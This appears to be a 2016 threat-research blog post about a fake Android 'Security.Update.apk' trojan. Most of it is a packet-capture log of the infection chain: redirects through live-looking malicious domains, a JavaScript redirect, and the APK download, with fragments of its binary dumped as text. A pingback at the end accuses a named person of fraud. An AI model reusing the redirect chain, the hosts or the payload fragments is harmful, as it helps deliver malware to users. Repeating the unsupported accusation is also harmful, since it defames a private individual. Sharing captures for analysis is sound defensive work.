RARE Android Linux OS Smart Phone Malware Fake Security Update : Security.Update.apk PCAP Traffic Download

By | January 29, 2016

Download fake security update Security.Update.apk Malware PCAP : android

 

Since it poses as a security update for Android, it’s highly likely that someone may fall for this trick and choose to install the malware. VIPRE Mobile detects this new variant as Trojan.AndroidOS.NoCom.a.

This particular Android Trojan doesn’t reveal itself with bells and whistles upon installation. Aside from its capability of running in the background, it doesn’t use a discernable icon. It also uses very nominal processing power and battery life. So how does this app work exactly? Whenever the infected Android device connects to the Internet, this malicious app phones back to its command & control (C&C) server, after which turns the device into a TCP relay.

 

2014-03-05 22:00:12.536109 IP 192.168.1.110.43818 > 142.11.194.109.80: Flags [P.], seq 1:389, ack 1, win 229, options [nop,nop,TS val 778152 ecr 135020245], length 388: HTTP: GET /tmwib/fox_news.php HTTP/1.1
E…f.@.?..)…n…m.*.P./…._t….>z…..
……>.GET /tmwib/fox_news.php HTTP/1.1
Host: billions2buy.com
Connection: keep-alive
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; Nexus 4 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/30.0.1599.105 Mobile Safari/537.36
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
2014-03-05 22:00:12.561697 IP 142.11.194.109.80 > 192.168.1.110.43818: Flags [.], ack 389, win 122, options [nop,nop,TS val 135020423 ecr 778152], length 0
E..4`.@.1..A…m…n.P.*.._t./…..zL6…..
..?…..
2014-03-05 22:00:12.612751 IP 142.11.194.109.80 > 192.168.1.110.43818: Flags [P.], seq 1:469, ack 389, win 122, options [nop,nop,TS val 135020475 ecr 778152], length 468: HTTP: HTTP/1.1 200 OK
E…`.@.1..l…m…n.P.*.._t./…..zP……
..?…..HTTP/1.1 200 OK
Date: Thu, 06 Mar 2014 03:00:12 GMT
Server: Apache/2.2.21 (Unix) mod_ssl/2.2.21 OpenSSL/1.0.0-fips mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_qos/9.74 mod_auth_passthrough/2.1 mod_perl/2.0.5 Perl/v5.8.8
X-Powered-By: PHP/5.3.9
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html

68
<meta http-equiv=”refresh” content=”2; url=http://mobile.downloadmobilesoftware.ru/FLVupdate.php “>

2014-03-05 22:00:15.097659 IP 192.168.1.110.44914 > 109.236.85.243.80: Flags [P.], seq 1:453, ack 1, win 229, options [nop,nop,TS val 778409 ecr 593653813], length 452: HTTP: GET /FLVupdate.php HTTP/1.1
E…o.@.?.D<…nm.U..r.P…Z.&.F…..%…..
….#bp5GET /FLVupdate.php HTTP/1.1
Host: mobile.downloadmobilesoftware.ru
Connection: keep-alive
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; Nexus 4 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/30.0.1599.105 Mobile Safari/537.36
Referer: http://billions2buy.com/tmwib/fox_news.php
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
2014-03-05 22:00:15.243268 IP 109.236.85.243.80 > 192.168.1.110.44914: Flags [.], ack 453, win 108, options [nop,nop,TS val 593653863 ecr 778409], length 0
E..4.!@.1…m.U….n.P.r.&.F…….l…….
#bpg….
2014-03-05 22:00:15.251693 IP 109.236.85.243.80 > 192.168.1.110.44915: Flags [S.], seq 443806906, ack 703730089, win 5792, options [mss 1460,sackOK,TS val 593653863 ecr 778408,nop,wscale 6], length 0
E..<..@.1…m.U….n.P.s.s..)…….<Q………
#bpg……..
2014-03-05 22:00:15.252024 IP 109.236.85.243.80 > 192.168.1.110.44914: Flags [P.], seq 1:347, ack 453, win 108, options [nop,nop,TS val 593653865 ecr 778409], length 346: HTTP: HTTP/1.1 200 OK
E….”@.1..Rm.U….n.P.r.&.F…….l.c…..
#bpi….HTTP/1.1 200 OK
Server: nginx/1.4.4
Date: Thu, 06 Mar 2014 03:55:24 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.3.25

9b
<html><head><script type=”text/javascript”>window.top.location=document.URL.replace(“FLVupdate.php”,”FLVupdate2.php”);</script></head><body></body></html>

0

2014-03-05 22:00:15.529240 IP 192.168.1.110.44914 > 109.236.85.243.80: Flags [P.], seq 453:917, ack 347, win 245, options [nop,nop,TS val 778451 ecr 593653865], length 464: HTTP: GET /FLVupdate2.php HTTP/1.1
E…o.@.?.D….nm.U..r.P…..&……1u…..
….#bpiGET /FLVupdate2.php HTTP/1.1
Host: mobile.downloadmobilesoftware.ru
Connection: keep-alive
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; Nexus 4 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/30.0.1599.105 Mobile Safari/537.36
Referer: http://mobile.downloadmobilesoftware.ru/FLVupdate.php
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
2014-03-05 22:00:15.680768 IP 109.236.85.243.80 > 192.168.1.110.44914: Flags [.], seq 347:1795, ack 917, win 124, options [nop,nop,TS val 593653973 ecr 778451], length 1448: HTTP: HTTP/1.1 200 OK
E….#@.1…m.U….n.P.r.&………|.?…..
#bp…..HTTP/1.1 200 OK
Server: nginx/1.4.4
Date: Thu, 06 Mar 2014 03:55:25 GMT
Content-Type: application/vnd.android.package-archive
Content-Length: 64600
Connection: keep-alive
X-Powered-By: PHP/5.3.25
Content-Disposition: attachment; filename=”Security.Update.apk”

PK..
……z<D…………….res/raw/data…….A d.n…g.*.9.(…I..
~.;’._…u.r….)..f.”..6.}…C@O…!G…xHJH..Fp?……}h..,…..:…[…).B..S.l*N…..@.N.<vNp.H.J<…G<…….k.zQ……A?<#….SyA.gc-F.. 7…J..%..q…..7..K..2x.~…\…..(.*…C…|j..PT3D+.@.D.qs…..R..O..!..Qt.#..W.?.PK..
…..l.d@S.;………….res/raw/pub….2…..>…..4….{.\….h.{.a63.+…..Q9..e……;oh.c..xO…`.BjP………&./\….f…..]…….#.hC?e..Rt.v…>.!.!..WK…PK………{<D…………….AndroidManifest.xml.T.n.A.=…:~.y…E<“….Q..KD..9&.&.’….7(H….:………|………-……{…….p….8….s}..g..D.xM.’N.3….X…x@……..J.$…../.w…..k.2Q#>.)Fi..6″…K.w.t..a…..3″.N.W..`.(.i…….0G.6*..pL.=.[..>….|.L.. ..hQ..K…o-..0.x…v.Q…6…m.=t.C..q.D…….].K…I~.v.r>……+~1….9o…*.W..Q…..q..mQ9..6n.*c@….?……………PfO.q………%….k…P.1…-.2ps@.*…
{.L..T.P.N..’x.U.R…..J…1g*s.. .M.=.VT%…z(..D#.Z+.H.:..=.lF<b……|_.juDz…..\………._Z.X.U.:U.R….x….zf…D.h.></Gd.<..3…..y…….xu..>…_GR?._…zf%…z=%Y=.2Z.Ur…i.!K..W>.9….\.!p.T.{…y…b…1.7[..3z…..^…….@o\..[z.>zi….w….z.Zd,….P……..
2014-03-05 22:00:15.680966 IP 109.236.85.243.80 > 192.168.1.110.44914: Flags [.], seq 1795:3243, ack 917, win 124, options [nop,nop,TS val 593653973 ecr 778451], length 1448: HTTP
E….$@.1…m.U….n.P.r.&.H…….|IZ…..
#bp……e..j.~.Z.t.~R1t-..>1..?.>…E;…..L~…l.|..=.Y.v…..zE.W..\?…3.~….’.z.~..v=.7…PK…c&………PK..
……{<DT4…………..resources.arsc…………….<……………0……………6…|………r.e.s./.r.a.w./.d.a.t.a…..r.e.s./.r.a.w./.p.u.b…!.r.e.s./.d.r.a.w.a.b.l.e.-.m.d.p.i./.i.c._.l.a.u.n.c.h.e.r…p.n.g…!.r.e.s./.d.r.a.w.a.b.l.e.-.h.d.p.i./.i.c._.l.a.u.n.c.h.e.r…p.n.g…”.r.e.s./.d.r.a.w.a.b.l.e.-.x.h.d.p.i./.i.c._.l.a.u.n.c.h.e.r…p.n.g………H…….c.o.m…s.e.c.u.r.i.t.y…p.a.t.c.h………………………………………………………………………………………………………………………………………………………………………………………………………….p………..T……………(…………… …..a.t.t.r…..d.r.a.w.a.b.l.e…..r.a.w………X……………(……………&…..i.c._.l.a.u.n.c.h.e.r…..d.a.t.a…..p.u.b…………………………………..8.L………..<…$…………………………………………………8.L………..<…$…………………………………………………8.L………..<…$………….@………………………………………………………….8.`………..@…$…………………………………………………………………PK..
…..h..B…_.#…#..!…res/drawable-hdpi/ic_launcher.png.PNG

2014-03-05 22:00:25.294090 IP 192.168.1.110.34858 > 109.236.85.243.80: Flags [P.], seq 1:349, ack 1, win 229, options [nop,nop,TS val 779428 ecr 593656320], length 348: HTTP: GET /FLVupdate2.php HTTP/1.1
E…H @.?.li…nm.U..*.PNP.y.{.6………..
….#bz.GET /FLVupdate2.php HTTP/1.1
Referer: http://mobile.downloadmobilesoftware.ru/FLVupdate.php
User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; Nexus 4 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/30.0.1599.105 Mobile Safari/537.36
Cookie:
Accept-Encoding: identity
Host: mobile.downloadmobilesoftware.ru
Connection: Keep-Alive
2014-03-05 22:00:25.433270 IP 109.236.85.243.80 > 192.168.1.110.34858: Flags [.], ack 349, win 108, options [nop,nop,TS val 593656410 ecr 779428], length 0
E..4f}@.1.]Qm.U….n.P.*.{.6NP…..l…….
#bzZ….
2014-03-05 22:00:25.442352 IP 109.236.85.243.80 > 192.168.1.110.34858: Flags [.], seq 1:1449, ack 349, win 108, options [nop,nop,TS val 593656413 ecr 779428], length 1448: HTTP: HTTP/1.1 200 OK
E…f~@.1.W.m.U….n.P.*.{.6NP…..l…….
#bz]….HTTP/1.1 200 OK
Server: nginx/1.4.4
Date: Thu, 06 Mar 2014 03:55:35 GMT
Content-Type: application/vnd.android.package-archive
Content-Length: 64600
Connection: keep-alive
X-Powered-By: PHP/5.3.25
Content-Disposition: attachment; filename=”Security.Update.apk”

PK..
……z<D…………….res/raw/data…….A d.n…g.*.9.(…I..
~.;’._…u.r….)..f.”..6.}…C@O…!G…xHJH..Fp?……}h..,…..:…[…).B..S.l*N…..@.N.<vNp.H.J<…G<…….k.zQ……A?<#….SyA.gc-F.. 7…J..%..q…..7..K..2x.~…\…..(.*…C…|j..PT3D+.@.D.qs…..R..O..!..Qt.#..W.?.PK..
…..l.d@S.;………….res/raw/pub….2…..>…..4….{.\….h.{.a63.+…..Q9..e……;oh.c..xO…`.BjP………&./\….f…..]…….#.hC?e..Rt.v…>.!.!..WK…PK………{<D…………….AndroidManifest.xml.T.n.A.=…:~.y…E<“….Q..KD..9&.&.’….7(H….:………|………-……{…….p….8….s}..g..D.xM.’N.3….X…x@……..J.$…../.w…..k.2Q#>.)Fi..6″…K.w.t..a…..3″.N.W..`.(.i…….0G.6*..pL.=.[..>….|.L.. ..hQ..K…o-..0.x…v.Q…6…m.=t.C..q.D…….].K…I~.v.r>……+~1….9o…*.W..Q…..q..mQ9..6n.*c@….?……………PfO.q………%….k…P.1…-.2ps@.*…
{.L..T.P.N..’x.U.R…..J…1g*s.. .M.=.VT%…z(..D#.Z+.H.:..=.lF<b……|_.juDz…..\………._Z.X.U.:U.R….x….zf…D.h.></Gd.<..3…..y…….xu..>…_GR?._…zf%…z=%Y=.2Z.Ur…i.!K..W>.9….\.!p.T.{…y…b…1.7[..3z…..^…….@o\..[z.>zi….w….z.Zd,….P……..
2014-03-05 22:00:25.442615 IP 109.236.85.243.80 > 192.168.1.110.34858: Flags [.], seq 1449:2897, ack 349, win 108, options [nop,nop,TS val 593656413 ecr 779428], length 1448: HTTP
E…f.@.1.W.m.U….n.P.*.{!.NP…..l1……
#bz]…..e..j.~.Z.t.~R1t-..>1..?.>…E;…..L~…l.|..=.Y.v…..zE.W..\?…3.~….’.z.~..v=.7…PK…c&………PK..
……{<DT4…………..resources.arsc…………….<……………0……………6…|………r.e.s./.r.a.w./.d.a.t.a…..r.e.s./.r.a.w./.p.u.b…!.r.e.s./.d.r.a.w.a.b.l.e.-.m.d.p.i./.i.c._.l.a.u.n.c.h.e.r…p.n.g…!.r.e.s./.d.r.a.w.a.b.l.e.-.h.d.p.i./.i.c._.l.a.u.n.c.h.e.r…p.n.g…”.r.e.s./.d.r.a.w.a.b.l.e.-.x.h.d.p.i./.i.c._.l.a.u.n.c.h.e.r…p.n.g………H…….c.o.m…s.e.c.u.r.i.t.y…p.a.t.c.h………………………………………………………………………………………………………………………………………………………………………………………………………….p………..T……………(…………… …..a.t.t.r…..d.r.a.w.a.b.l.e…..r.a.w………X……………(……………&…..i.c._.l.a.u.n.c.h.e.r…..d.a.t.a…..p.u.b…………………………………..8.L………..<…$…………………………………………………8.L………..<…$…………………………………………………8.L………..<…$………….@………………………………………………………….8.`………..@…$…………………………………………………………………PK..
…..h..B…_.#…#..!…res/drawable-hdpi/ic_launcher.png.PNG
.

2014-03-05 22:00:26.274306 IP 109.236.85.243.80 > 192.168.1.110.34858: Flags [P.], seq 63470:64871, ack 349, win 108, options [nop,nop,TS val 593656619 ecr 779512], length 1401: HTTP
E…f.@.1.W.m.U….n.P.*.|.#NP…..l6……
#b{+….-H3.0a…4g9.Oi..O+21320.V4.7….,….H.’…m.O…k,..!O0X..-..Aa… .f.\.S…..Z……#.f…{…..4;^..c……{………O.v.ySi……..N..;.(5.@…aN..M/..]…*.4…I.?.t.U.Ukw…..#..s..l.z.m…]..z\69M&…Y.<N….\.qR..vvWb..t.A.|…R:…h..f…..?….Uo….L…….y.t.w…7..ufaXM….\+.fU…6..o.w…..{…m…………F..8…K.w.61…R.0…..D.9 )…W.&F……..Y”2G……O.C..J..T…..k…..;.\X…………4..-…….E….jM…Q……I….%…~..z.x….}.J….y.b…..w{……n…Qr..\|D…6{ ..N…{o.L.w..[…….,2Z.P.pN.K..$…….2..A
{T.\67.^P..7m…..><……..z..k..*.J….U..t&hm…..p…….<.9 …..|.`V…o..4N..PK…0$………PK..
.
……z<D…………………………res/raw/data….PK..
.
…..l.d@S.;…………………..+…res/raw/pubPK………..{<D.c&………………………AndroidManifest.xmlPK..
.
……{<DT4……………………….resources.arscPK..
.
…..h..B…_.#…#..!………….. ..res/drawable-hdpi/ic_launcher.pngPK..
.
…..h..B…………!…………..-..res/drawable-mdpi/ic_launcher.pngPK..
.
…..i..B…..6…6..”…………..A..res/drawable-xhdpi/ic_launcher.pngPK……….D.]C..r.Hx…6……………..y..classes.dexPK………..{<D+\..g…………………….META-INF/MANIFEST.MFPK………..{<DI'<…………………..D…META-INF/CERT.SFPK………..{<D.0$………………………META-INF/CERT.RSAPK…………..h…..
2014-03-05 22:00:26.347896 IP 192.168.1.110.34858 > 109.236.85.243.80: Flags [.], ack 51886, win 1858, options [nop,nop,TS val 779534 ecr 593656618], length 0
E..4H-@.?.m….nm.U..*.PNP…{…..B…….
….#b{*

 

Share Button

One thought on “RARE Android Linux OS Smart Phone Malware Fake Security Update : Security.Update.apk PCAP Traffic Download

  1. Pingback: Margaret Cunniffe is an Australian Fraudster based in Melbourne Victoria who abuses those closest to her to achieve her selfish objectives.

Leave a Reply

Your email address will not be published. Required fields are marked *